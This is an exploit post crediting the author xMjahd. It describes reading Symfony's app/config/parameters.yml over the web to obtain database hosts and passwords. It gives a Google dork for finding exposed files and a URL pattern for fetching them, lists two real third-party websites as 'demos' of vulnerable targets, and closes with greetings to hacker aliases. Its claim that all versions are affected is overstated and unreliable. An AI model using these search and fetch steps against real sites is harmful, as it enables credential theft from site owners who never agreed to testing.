facebook facebook twitter rss

symfony Framework Database Configuration-File disclosure

Author: xMjahd , Published: 17-05-2013
###########################################################################
[~] Exploit Title: symfony Framework Database Configuration-File disclosure
[~] Date: 11-05-2013
[~] Author: xMjahd
[~] Contact: xMjahd[at]gmail[dot]com
[~] Vendor Homepage: http://symfony.com/download
[~] Category: webapps/php
[~] Version: All version
[~] Tested on: Windows
###########################################################################

# informations
symfony Symfony is a PHP framework for web projects
Speed up the creation and maintenance of your PHP web applications.
Replace the repetitive coding tasks by power, control and pleasure. ...

# Exploit
As we can see all the famework have this configuration infos on this location
app/config/parameters.yml => .yml type file so u can open the file and see
the infos
1 - Google Dork:"app/config/parameters.yml"
2 - http://server/[path]/app/config/parameters.yml
##################################
# database_driver: ******* #
# database_host: ****** #
# database_password : ***** #
##################################
# Demos
http://freeuploads.fr/euskalibur/app/config/parameters.yml
http://molipet.com/app/config/parameters.yml
Greet's To iPunish , xLine , Mr-H4rd3n , Federal , Sql_M4ster ,Zombi3_Ma ,Mauritanian Attacker , Dr-Spam ,
Mr-Benladen ,V!ru$ No!r, Azar36.exe ,syS Anti
[~] Made in Morocco ;p Santacruz .

Like us on Facebook :